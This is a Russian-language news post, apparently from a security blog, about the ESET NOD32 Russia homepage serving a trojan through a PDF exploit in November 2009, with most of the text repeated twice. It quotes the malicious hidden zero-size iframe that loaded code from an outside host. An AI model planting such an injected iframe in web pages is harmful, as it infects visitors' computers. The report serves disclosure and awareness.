Уязвимые сайты → Сайт ESET NOD32 Russia, раздавал трояны
Главная страница сайта российского представительства антивирусной компании ESET какое-то время представляла опасность для посетителей.
Судя по сообщению хабраюзера DizelGenerator, при посещении этой странички в браузере Opera, открылся некий PDF-файл, после чего произошла попытка запуска странного исполняемого файла.
DizelGenerator рассказывает как "Вчера, 19.11.2009, зайдя на главную страницу сайта ESET NOD32 Russia, был неприятно удивлен: неожиданно открылся какой-то левый pdf-файл, после чего Comodo Firewall сообщил, что браузер Opera пытается запустить файл wJQs.exe..."
В случае с данным пользователем попытка заражения его компьютера не удалась, благо у него стояла защита в виде файрвола. Однако, судя по всему, попытка эта основывалась на эксплуатации одной из уязвимостей PDF-файлов.
В коде страницы при этом был обнаружен скрытый iframe, откуда на компьютеры пользователей внедрялся, а потом и запускался вредоносный код:
Примечательно, что изначально, т.е. по крайней мере с 19 ноября, антивирусный продукт компании ESET, NOD32, эту заразу не распознавал.
Судя по обсуждению данной проблемы на официальных форумах ESET, антивирус Касперского идентифицировал её как Trojan-Downloader.Java.Agent.ab (сигнатура добавлена в базу "Лаборатории Касперского" 18 ноября).
В базы NOD32 новый троян был добавлен в течение суток после того, как DizelGenerator сообщил о своей находке в форуме.
Однако сайт какое-то время после этого так и оставался зараженным. Сейчас вредоносный код с его страниц уже убран, сервис Unmask Parasites определяет этот ресурс как "чистый".
Официальных комментариев со стороны ESET пока не поступало.
Напомним, что сайты антивирусных компаний нередко становятся объектами атак хакеров.
В этом году, например, успели пострадать:
p.s. все вышеуказанные уязвимости были найдены одной команды - HackersBlog
Также, несколько дней назад один из проектов компании Microsoft - DreamSpark был взломан, а для тех, кто хочет посмотреть весь список сайтов, у которых были проблемы с безопасностью, рекомендуем посмотреть раздел Уязвимые сайты, уверен, что найдёте много интересного!
Судя по сообщению хабраюзера DizelGenerator, при посещении этой странички в браузере Opera, открылся некий PDF-файл, после чего произошла попытка запуска странного исполняемого файла.
DizelGenerator рассказывает как "Вчера, 19.11.2009, зайдя на главную страницу сайта ESET NOD32 Russia, был неприятно удивлен: неожиданно открылся какой-то левый pdf-файл, после чего Comodo Firewall сообщил, что браузер Opera пытается запустить файл wJQs.exe..."
В случае с данным пользователем попытка заражения его компьютера не удалась, благо у него стояла защита в виде файрвола. Однако, судя по всему, попытка эта основывалась на эксплуатации одной из уязвимостей PDF-файлов.
В коде страницы при этом был обнаружен скрытый iframe, откуда на компьютеры пользователей внедрялся, а потом и запускался вредоносный код:
<iframe pcvsn='j6Av392D' src='http://newiframe.com/s/in.cgi?6 ' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>
Примечательно, что изначально, т.е. по крайней мере с 19 ноября, антивирусный продукт компании ESET, NOD32, эту заразу не распознавал.
Судя по обсуждению данной проблемы на официальных форумах ESET, антивирус Касперского идентифицировал её как Trojan-Downloader.Java.Agent.ab (сигнатура добавлена в базу "Лаборатории Касперского" 18 ноября).
В базы NOD32 новый троян был добавлен в течение суток после того, как DizelGenerator сообщил о своей находке в форуме.
Однако сайт какое-то время после этого так и оставался зараженным. Сейчас вредоносный код с его страниц уже убран, сервис Unmask Parasites определяет этот ресурс как "чистый".
Официальных комментариев со стороны ESET пока не поступало.
Напомним, что сайты антивирусных компаний нередко становятся объектами атак хакеров.
В этом году, например, успели пострадать:
# Лаборатории Касперского
# BitDefender (Португалия)
# F-Secure
# emea.symantec.com
# все сайты компании BitDefender
p.s. все вышеуказанные уязвимости были найдены одной команды - HackersBlog
Также, несколько дней назад один из проектов компании Microsoft - DreamSpark был взломан, а для тех, кто хочет посмотреть весь список сайтов, у которых были проблемы с безопасностью, рекомендуем посмотреть раздел Уязвимые сайты, уверен, что найдёте много интересного!